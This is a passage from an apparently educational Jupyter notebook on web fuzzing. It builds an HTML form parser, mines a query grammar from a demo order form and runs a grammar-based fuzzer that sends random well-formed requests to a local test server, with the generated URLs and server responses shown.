   "source": [
    "During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute.  While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`\"text\"`, `\"number\"`, `\"checkbox\"`, etc.).  Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 103,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.270224Z",
     "iopub.status.busy": "2025-01-16T10:12:26.270115Z",
     "iopub.status.idle": "2025-01-16T10:12:26.272170Z",
     "shell.execute_reply": "2025-01-16T10:12:26.271889Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class FormHTMLParser(HTMLParser):\n",
    "    \"\"\"A parser for HTML forms\"\"\"\n",
    "\n",
    "    def reset(self) -> None:\n",
    "        super().reset()\n",
    "\n",
    "        # Form action  attribute (a URL)\n",
    "        self.action = \"\"\n",
    "\n",
    "        # Map of field name to type\n",
    "        # (or selection name to [option_1, option_2, ...])\n",
    "        self.fields: Dict[str, List[str]] = {}\n",
    "\n",
    "        # Stack of currently active selection names\n",
    "        self.select: List[str] = [] "
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`).  `attributes` gives us a map of associated attributes and values.\n",
    "\n",
    "Here is how we process the individual tags:\n",
    "* When we find a `<form>` tag, we save the associated action in the `action` attribute;\n",
    "* When we find an `<input>` tag or similar, we save the type in the `fields` attribute;\n",
    "* When we find a `<select>` tag or similar, we push its name on the `select` stack;\n",
    "* When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 104,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.274135Z",
     "iopub.status.busy": "2025-01-16T10:12:26.274029Z",
     "iopub.status.idle": "2025-01-16T10:12:26.276856Z",
     "shell.execute_reply": "2025-01-16T10:12:26.276633Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class FormHTMLParser(FormHTMLParser):\n",
    "    def handle_starttag(self, tag, attrs):\n",
    "        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}\n",
    "        # print(tag, attributes)\n",
    "\n",
    "        if tag == \"form\":\n",
    "            self.action = attributes.get(\"action\", \"\")\n",
    "\n",
    "        elif tag == \"select\" or tag == \"datalist\":\n",
    "            if \"name\" in attributes:\n",
    "                name = attributes[\"name\"]\n",
    "                self.fields[name] = []\n",
    "                self.select.append(name)\n",
    "            else:\n",
    "                self.select.append(None)\n",
    "\n",
    "        elif tag == \"option\" and \"multiple\" not in attributes:\n",
    "            current_select_name = self.select[-1]\n",
    "            if current_select_name is not None and \"value\" in attributes:\n",
    "                self.fields[current_select_name].append(attributes[\"value\"])\n",
    "\n",
    "        elif tag == \"input\" or tag == \"option\" or tag == \"textarea\":\n",
    "            if \"name\" in attributes:\n",
    "                name = attributes[\"name\"]\n",
    "                self.fields[name] = attributes.get(\"type\", \"text\")\n",
    "\n",
    "        elif tag == \"button\":\n",
    "            if \"name\" in attributes:\n",
    "                name = attributes[\"name\"]\n",
    "                self.fields[name] = [\"\"]"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 105,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.278261Z",
     "iopub.status.busy": "2025-01-16T10:12:26.278162Z",
     "iopub.status.idle": "2025-01-16T10:12:26.279771Z",
     "shell.execute_reply": "2025-01-16T10:12:26.279514Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class FormHTMLParser(FormHTMLParser):\n",
    "    def handle_endtag(self, tag):\n",
    "        if tag == \"select\":\n",
    "            self.select.pop()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript.  Also, it does not support all HTML input types."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us put this parser to action.  We create a class `HTMLGrammarMiner` that takes a HTML document to parse.  It then returns the associated action and the associated fields:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 106,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.281744Z",
     "iopub.status.busy": "2025-01-16T10:12:26.281651Z",
     "iopub.status.idle": "2025-01-16T10:12:26.283574Z",
     "shell.execute_reply": "2025-01-16T10:12:26.283296Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class HTMLGrammarMiner:\n",
    "    \"\"\"Mine a grammar from a HTML form\"\"\"\n",
    "\n",
    "    def __init__(self, html_text: str) -> None:\n",
    "        \"\"\"Constructor. `html_text` is the HTML string to parse.\"\"\"\n",
    "\n",
    "        html_parser = FormHTMLParser()\n",
    "        html_parser.feed(html_text)\n",
    "        self.fields = html_parser.fields\n",
    "        self.action = html_parser.action"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Applied on our order form, this is what we get:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 107,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.285699Z",
     "iopub.status.busy": "2025-01-16T10:12:26.285599Z",
     "iopub.status.idle": "2025-01-16T10:12:26.287985Z",
     "shell.execute_reply": "2025-01-16T10:12:26.287680Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order'"
      ]
     },
     "execution_count": 107,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "html_miner = HTMLGrammarMiner(html_text)\n",
    "html_miner.action"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 108,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.289395Z",
     "iopub.status.busy": "2025-01-16T10:12:26.289302Z",
     "iopub.status.idle": "2025-01-16T10:12:26.291129Z",
     "shell.execute_reply": "2025-01-16T10:12:26.290906Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "{'item': ['tshirt', 'drill', 'lockset'],\n",
       " 'name': 'text',\n",
       " 'email': 'email',\n",
       " 'city': 'text',\n",
       " 'zip': 'number',\n",
       " 'terms': 'checkbox',\n",
       " 'submit': 'submit'}"
      ]
     },
     "execution_count": 108,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "html_miner.fields"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "From this structure, we can now generate a grammar that automatically produces valid form submission URLs."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Mining Grammars for Web Pages"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb).  The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule.  Our default grammar provides very simple rules for these types."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 109,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.292695Z",
     "iopub.status.busy": "2025-01-16T10:12:26.292606Z",
     "iopub.status.idle": "2025-01-16T10:12:26.294132Z",
     "shell.execute_reply": "2025-01-16T10:12:26.293918Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 110,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.295515Z",
     "iopub.status.busy": "2025-01-16T10:12:26.295443Z",
     "iopub.status.idle": "2025-01-16T10:12:26.297603Z",
     "shell.execute_reply": "2025-01-16T10:12:26.297383Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class HTMLGrammarMiner(HTMLGrammarMiner):\n",
    "    QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {\n",
    "        \"<start>\": [\"<action>?<query>\"],\n",
    "\n",
    "        \"<text>\": [\"<string>\"],\n",
    "\n",
    "        \"<number>\": [\"<digits>\"],\n",
    "        \"<digits>\": [\"<digit>\", \"<digits><digit>\"],\n",
    "        \"<digit>\": crange('0', '9'),\n",
    "\n",
    "        \"<checkbox>\": [\"<_checkbox>\"],\n",
    "        \"<_checkbox>\": [\"on\", \"off\"],\n",
    "\n",
    "        \"<email>\": [\"<_email>\"],\n",
    "        \"<_email>\": [cgi_encode(\"<string>@<string>\", \"<>\")],\n",
    "\n",
    "        # Use a fixed password in case we need to repeat it\n",
    "        \"<password>\": [\"<_password>\"],\n",
    "        \"<_password>\": [\"abcABC.123\"],\n",
    "\n",
    "        # Stick to printable characters to avoid logging problems\n",
    "        \"<percent>\": [\"%<hexdigit-1><hexdigit>\"],\n",
    "        \"<hexdigit-1>\": srange(\"34567\"),\n",
    "\n",
    "        # Submissions:\n",
    "        \"<submit>\": [\"\"]\n",
    "    })"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Our grammar miner now takes the fields extracted from HTML, converting them into rules.  Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 111,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.299561Z",
     "iopub.status.busy": "2025-01-16T10:12:26.299451Z",
     "iopub.status.idle": "2025-01-16T10:12:26.302290Z",
     "shell.execute_reply": "2025-01-16T10:12:26.302004Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class HTMLGrammarMiner(HTMLGrammarMiner):\n",
    "    def mine_grammar(self) -> Grammar:\n",
    "        \"\"\"Extract a grammar from the given HTML text\"\"\"\n",
    "\n",
    "        grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)\n",
    "        grammar[\"<action>\"] = [self.action]\n",
    "\n",
    "        query = \"\"\n",
    "        for field in self.fields:\n",
    "            field_symbol = new_symbol(grammar, \"<\" + field + \">\")\n",
    "            field_type = self.fields[field]\n",
    "\n",
    "            if query != \"\":\n",
    "                query += \"&\"\n",
    "            query += field_symbol\n",
    "\n",
    "            if isinstance(field_type, str):\n",
    "                field_type_symbol = \"<\" + field_type + \">\"\n",
    "                grammar[field_symbol] = [field + \"=\" + field_type_symbol]\n",
    "                if field_type_symbol not in grammar:\n",
    "                    # Unknown type\n",
    "                    grammar[field_type_symbol] = [\"<text>\"]\n",
    "            else:\n",
    "                # List of values\n",
    "                value_symbol = new_symbol(grammar, \"<\" + field + \"-value>\")\n",
    "                grammar[field_symbol] = [field + \"=\" + value_symbol]\n",
    "                grammar[value_symbol] = field_type  # type: ignore\n",
    "\n",
    "        grammar[\"<query>\"] = [query]\n",
    "\n",
    "        # Remove unused parts\n",
    "        for nonterminal in unreachable_nonterminals(grammar):\n",
    "            del grammar[nonterminal]\n",
    "\n",
    "        assert is_valid_grammar(grammar)\n",
    "\n",
    "        return grammar"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Let us show `HTMLGrammarMiner` in action, again applied on our order form.  Here is the full resulting grammar:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 112,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.303894Z",
     "iopub.status.busy": "2025-01-16T10:12:26.303769Z",
     "iopub.status.idle": "2025-01-16T10:12:26.306610Z",
     "shell.execute_reply": "2025-01-16T10:12:26.306332Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "{'<start>': ['<action>?<query>'],\n",
       " '<string>': ['<letter>', '<letter><string>'],\n",
       " '<letter>': ['<plus>', '<percent>', '<other>'],\n",
       " '<plus>': ['+'],\n",
       " '<percent>': ['%<hexdigit-1><hexdigit>'],\n",
       " '<hexdigit>': ['0',\n",
       "  '1',\n",
       "  '2',\n",
       "  '3',\n",
       "  '4',\n",
       "  '5',\n",
       "  '6',\n",
       "  '7',\n",
       "  '8',\n",
       "  '9',\n",
       "  'a',\n",
       "  'b',\n",
       "  'c',\n",
       "  'd',\n",
       "  'e',\n",
       "  'f'],\n",
       " '<other>': ['0', '1', '2', '3', '4', '5', 'a', 'b', 'c', 'd', 'e', '-', '_'],\n",
       " '<text>': ['<string>'],\n",
       " '<number>': ['<digits>'],\n",
       " '<digits>': ['<digit>', '<digits><digit>'],\n",
       " '<digit>': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],\n",
       " '<checkbox>': ['<_checkbox>'],\n",
       " '<_checkbox>': ['on', 'off'],\n",
       " '<email>': ['<_email>'],\n",
       " '<_email>': ['<string>%40<string>'],\n",
       " '<hexdigit-1>': ['3', '4', '5', '6', '7'],\n",
       " '<submit>': [''],\n",
       " '<action>': ['/order'],\n",
       " '<item>': ['item=<item-value>'],\n",
       " '<item-value>': ['tshirt', 'drill', 'lockset'],\n",
       " '<name>': ['name=<text>'],\n",
       " '<email-1>': ['email=<email>'],\n",
       " '<city>': ['city=<text>'],\n",
       " '<zip>': ['zip=<number>'],\n",
       " '<terms>': ['terms=<checkbox>'],\n",
       " '<submit-1>': ['submit=<submit>'],\n",
       " '<query>': ['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']}"
      ]
     },
     "execution_count": 112,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "html_miner = HTMLGrammarMiner(html_text)\n",
    "grammar = html_miner.mine_grammar()\n",
    "grammar"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Let us take a look into the structure of the grammar.  It produces URL paths of this form:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 113,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.308203Z",
     "iopub.status.busy": "2025-01-16T10:12:26.308096Z",
     "iopub.status.idle": "2025-01-16T10:12:26.309904Z",
     "shell.execute_reply": "2025-01-16T10:12:26.309701Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['<action>?<query>']"
      ]
     },
     "execution_count": 113,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar[\"<start>\"]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Here, the `<action>` comes from the `action` attribute of the HTML form:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 114,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.311367Z",
     "iopub.status.busy": "2025-01-16T10:12:26.311277Z",
     "iopub.status.idle": "2025-01-16T10:12:26.313101Z",
     "shell.execute_reply": "2025-01-16T10:12:26.312903Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['/order']"
      ]
     },
     "execution_count": 114,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar[\"<action>\"]"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "The `<query>` is composed of the individual field items:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 115,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.314515Z",
     "iopub.status.busy": "2025-01-16T10:12:26.314415Z",
     "iopub.status.idle": "2025-01-16T10:12:26.316292Z",
     "shell.execute_reply": "2025-01-16T10:12:26.316073Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']"
      ]
     },
     "execution_count": 115,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar[\"<query>\"]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 116,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.317728Z",
     "iopub.status.busy": "2025-01-16T10:12:26.317623Z",
     "iopub.status.idle": "2025-01-16T10:12:26.319389Z",
     "shell.execute_reply": "2025-01-16T10:12:26.319170Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['zip=<number>']"
      ]
     },
     "execution_count": 116,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar[\"<zip>\"]"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 117,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.320810Z",
     "iopub.status.busy": "2025-01-16T10:12:26.320713Z",
     "iopub.status.idle": "2025-01-16T10:12:26.322412Z",
     "shell.execute_reply": "2025-01-16T10:12:26.322205Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['terms=<checkbox>']"
      ]
     },
     "execution_count": 117,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "grammar[\"<terms>\"]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "These are the query URLs produced from the grammar.  We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 118,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.323845Z",
     "iopub.status.busy": "2025-01-16T10:12:26.323750Z",
     "iopub.status.idle": "2025-01-16T10:12:26.335370Z",
     "shell.execute_reply": "2025-01-16T10:12:26.335152Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['/order?item=drill&name=++%61&email=%6e%40b++&city=0&zip=88&terms=on&submit=',\n",
       " '/order?item=tshirt&name=%3f&email=21+%40+&city=++&zip=4&terms=off&submit=',\n",
       " '/order?item=drill&name=2&email=%62%40++%4d1++_%77&city=e%5d&zip=1&terms=on&submit=']"
      ]
     },
     "execution_count": 118,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "order_fuzzer = GrammarFuzzer(grammar)\n",
    "[order_fuzzer.fuzz() for i in range(3)]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can again feed these directly into our Web browser:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 119,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.336787Z",
     "iopub.status.busy": "2025-01-16T10:12:26.336711Z",
     "iopub.status.idle": "2025-01-16T10:12:26.346424Z",
     "shell.execute_reply": "2025-01-16T10:12:26.346184Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] INSERT INTO orders VALUES ('drill', ' ', '5F @p   a ', 'cdb', '3230')\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=drill&name=+&email=5F+%40p+++a+&city=cdb&zip=3230&terms=on&submit= HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook Rotary Hammer</strong> to   in cdb, 3230<br>\n",
       "  A confirmation mail will be sent to 5F @p   a .\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 119,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We see (one more time) that we can mine a grammar automatically from given data."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### A Fuzzer for Web Forms\n",
    "\n",
    "To make things most convenient, let us define a `WebFormFuzzer` class that does everything in one place.  Given a URL, it extracts its HTML content, mines the grammar and then produces inputs for it."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 120,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.347945Z",
     "iopub.status.busy": "2025-01-16T10:12:26.347844Z",
     "iopub.status.idle": "2025-01-16T10:12:26.350406Z",
     "shell.execute_reply": "2025-01-16T10:12:26.350186Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class WebFormFuzzer(GrammarFuzzer):\n",
    "    \"\"\"A Fuzzer for Web forms\"\"\"\n",
    "\n",
    "    def __init__(self, url: str, *,\n",
    "                 grammar_miner_class: Optional[type] = None,\n",
    "                 **grammar_fuzzer_options):\n",
    "        \"\"\"Constructor.\n",
    "        `url` - the URL of the Web form to fuzz.\n",
    "        `grammar_miner_class` - the class of the grammar miner\n",
    "            to use (default: `HTMLGrammarMiner`)\n",
    "        Other keyword arguments are passed to the `GrammarFuzzer` constructor\n",
    "        \"\"\"\n",
    "\n",
    "        if grammar_miner_class is None:\n",
    "            grammar_miner_class = HTMLGrammarMiner\n",
    "        self.grammar_miner_class = grammar_miner_class\n",
    "\n",
    "        # We first extract the HTML form and its grammar...\n",
    "        html_text = self.get_html(url)\n",
    "        grammar = self.get_grammar(html_text)\n",
    "\n",
    "        # ... and then initialize the `GrammarFuzzer` superclass with it\n",
    "        super().__init__(grammar, **grammar_fuzzer_options)\n",
    "\n",
    "    def get_html(self, url: str):\n",
    "        \"\"\"Retrieve the HTML text for the given URL `url`.\n",
    "        To be overloaded in subclasses.\"\"\"\n",
    "        return requests.get(url).text\n",
    "\n",
    "    def get_grammar(self, html_text: str):\n",
    "        \"\"\"Obtain the grammar for the given HTML `html_text`.\n",
    "        To be overloaded in subclasses.\"\"\"\n",
    "        grammar_miner = self.grammar_miner_class(html_text)\n",
    "        return grammar_miner.mine_grammar()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "All it now takes to fuzz a Web form is to provide its URL:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 121,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.351764Z",
     "iopub.status.busy": "2025-01-16T10:12:26.351668Z",
     "iopub.status.idle": "2025-01-16T10:12:26.357599Z",
     "shell.execute_reply": "2025-01-16T10:12:26.357374Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order?item=lockset&name=%6b+&email=+%40b5&city=%7e+5&zip=65&terms=on&submit='"
      ]
     },
     "execution_count": 121,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_form_fuzzer = WebFormFuzzer(httpd_url)\n",
    "web_form_fuzzer.fuzz()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 122,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.359054Z",
     "iopub.status.busy": "2025-01-16T10:12:26.358972Z",
     "iopub.status.idle": "2025-01-16T10:12:26.401558Z",
     "shell.execute_reply": "2025-01-16T10:12:26.401303Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "[('http://127.0.0.1:8800/order?item=drill&name=+%6d&email=%40%400&city=%64&zip=9&terms=on&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=lockset&name=++&email=%63%40d&city=_&zip=6&terms=on&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=lockset&name=+&email=d%40_-&city=2++0&zip=1040&terms=off&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=tshirt&name=%4bb&email=%6d%40+&city=%7a%79+&zip=13&terms=off&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=lockset&name=d&email=%55+%40%74&city=+&zip=4&terms=on&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=tshirt&name=_+2&email=1++%40+&city=+&zip=30&terms=on&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=tshirt&name=+&email=a-%40+&city=+%57&zip=2&terms=on&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=lockset&name=%56&email=++%40a%55ee%44&city=+&zip=01&terms=off&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=tshirt&name=%6fc&email=++%40+&city=a&zip=25&terms=off&submit=',\n",
       "  'PASS'),\n",
       " ('http://127.0.0.1:8800/order?item=drill&name=55&email=3%3e%40%405&city=%4c&zip=0&terms=off&submit=',\n",
       "  'PASS')]"
      ]
     },
     "execution_count": 122,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "web_form_runner = WebRunner(httpd_url)\n",
    "web_form_fuzzer.runs(web_form_runner, 10)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "While convenient to use, this fuzzer is still very rudimentary:\n",
    "\n",
    "* It is limited to one form per page.\n",
    "* It only supports `GET` actions (i.e., inputs encoded into the URL).  A full Web form fuzzer would have to at least support `POST` actions.\n",
    "* The fuzzer is build on HTML only.  There is no Javascript handling for dynamic Web pages."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us clear any pending messages before we get to the next section:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 123,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.403071Z",
     "iopub.status.busy": "2025-01-16T10:12:26.402957Z",
     "iopub.status.idle": "2025-01-16T10:12:26.405119Z",
     "shell.execute_reply": "2025-01-16T10:12:26.404883Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "clear_httpd_messages()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Crawling User Interfaces"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "So far, we have assumed there would be only one form to explore.  A real Web server, of course, has several pages – and possibly several forms, too.  We define a simple *crawler* that explores all the links that originate from one page."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Our crawler is pretty straightforward.  Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form\n",
    "\n",
    "```html\n",
    "<a href=\"<link>\">\n",
    "```\n",
    "\n",
    "and saves all the links found in a list called `links`."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 124,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.406569Z",
     "iopub.status.busy": "2025-01-16T10:12:26.406471Z",
     "iopub.status.idle": "2025-01-16T10:12:26.408528Z",
